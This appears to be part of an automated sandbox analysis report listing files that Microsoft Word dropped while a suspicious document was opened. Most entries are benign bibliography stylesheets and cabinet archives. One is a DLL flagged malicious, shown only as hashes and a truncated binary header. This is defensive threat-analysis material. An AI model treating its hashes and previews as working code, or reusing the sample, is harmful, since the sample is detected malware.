                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):292
                        Entropy (8bit):3.5026803317779778
                        Encrypted:false
                        SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                        MD5:A0D51783BFEE86F3AC46A810404B6796
                        SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                        SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                        SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):251032
                        Entropy (8bit):5.102652100491927
                        Encrypted:false
                        SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                        MD5:F425D8C274A8571B625EE66A8CE60287
                        SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                        SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                        SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):314
                        Entropy (8bit):3.5230842510951934
                        Encrypted:false
                        SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                        MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                        SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                        SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                        SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):294178
                        Entropy (8bit):4.977758311135714
                        Encrypted:false
                        SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                        MD5:0C9731C90DD24ED5CA6AE283741078D0
                        SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                        SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                        SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):333258
                        Entropy (8bit):4.654450340871081
                        Encrypted:false
                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                        MD5:5632C4A81D2193986ACD29EADF1A2177
                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):328
                        Entropy (8bit):3.541819892045459
                        Encrypted:false
                        SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                        MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                        SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                        SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                        SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:modified
                        Size (bytes):332
                        Entropy (8bit):3.547857457374301
                        Encrypted:false
                        SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                        MD5:4EC6724CBBA516CF202A6BD17226D02C
                        SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                        SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                        SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):284415
                        Entropy (8bit):5.00549404077789
                        Encrypted:false
                        SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                        MD5:33A829B4893044E1851725F4DAF20271
                        SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                        SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                        SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31835
                        Entropy (8bit):7.81952379746457
                        Encrypted:false
                        SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                        MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                        SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                        SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                        SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31605
                        Entropy (8bit):7.820497014278096
                        Encrypted:false
                        SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                        MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                        SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                        SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                        SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31471
                        Entropy (8bit):7.818389271364328
                        Encrypted:false
                        SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                        MD5:91AADBEC4171CFA8292B618492F5EF34
                        SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                        SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                        SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):35519
                        Entropy (8bit):7.846686335981972
                        Encrypted:false
                        SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                        MD5:53EE9DA49D0B84357038ECF376838D2E
                        SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                        SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                        SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):46413
                        Entropy (8bit):7.9071408623961394
                        Encrypted:false
                        SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                        MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                        SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                        SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                        SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31008
                        Entropy (8bit):7.806058951525675
                        Encrypted:false
                        SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                        MD5:E033CCBC7BA787A2F824CE0952E57D44
                        SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                        SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                        SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):33610
                        Entropy (8bit):7.8340762758330476
                        Encrypted:false
                        SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                        MD5:51804E255C573176039F4D5B55C12AB2
                        SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                        SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                        SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):30957
                        Entropy (8bit):7.808231503692675
                        Encrypted:false
                        SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                        MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                        SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                        SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                        SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):28911
                        Entropy (8bit):7.7784119983764715
                        Encrypted:false
                        SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                        MD5:6D787B1E223DB6B91B69238062CCA872
                        SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                        SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                        SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31482
                        Entropy (8bit):7.808057272318224
                        Encrypted:false
                        SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                        MD5:F10DF902980F1D5BEEA96B2C668408A7
                        SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                        SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                        SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):32833
                        Entropy (8bit):7.825460303519308
                        Encrypted:false
                        SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                        MD5:205AF51604EF96EF1E8E60212541F742
                        SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                        SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                        SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):34816
                        Entropy (8bit):7.840826397575377
                        Encrypted:false
                        SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                        MD5:62863124CDCDA135ECC0E722782CB888
                        SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                        SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                        SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                        Category:dropped
                        Size (bytes):31562
                        Entropy (8bit):7.81640835713744
                        Encrypted:false
                        SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                        MD5:1D6F8E73A0662A48D332090A4C8C898F
                        SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                        SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                        SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):720896
                        Entropy (8bit):6.648944468588579
                        Encrypted:false
                        SSDEEP:12288:uC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1ag:HKHaY8k5faaboEy6r8zz1
                        MD5:9DC6F214FC82D637DE2F68F3C519D339
                        SHA1:AAA425F7377D405BEA59B8ADFB65AFC0C8869886
                        SHA-256:2A8B737A4752060A308C4312B7C0CF6C05CDE5B370906286DEA9CDD36F5AA613
                        SHA-512:5CB0A6F3AB48E5127D5C9F638C035DD4B3A97F3EB31334D5BC3EEAFC164B31540FEA65D6E40ABFAC8566676C43E954F567DBC2AF81A629B4059AF7E466D75BEF
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 77%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................H#.......0....@..........................@...............................................`..J$...@..............................................................................................................CODE....h........................... ..`DATA.........0......................@...BSS.....%....P.......0...................idata..J$...`...&...0..............@....reloc...............V..............@..P.rsrc........@......................@..P.............@......................@..P........................................................................................................................................................................................................................
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:gAWY3n:qY3n
                        MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                        SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                        SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                        SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                        Malicious:false
                        Preview:[ZoneTransfer]..ZoneId=3..
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
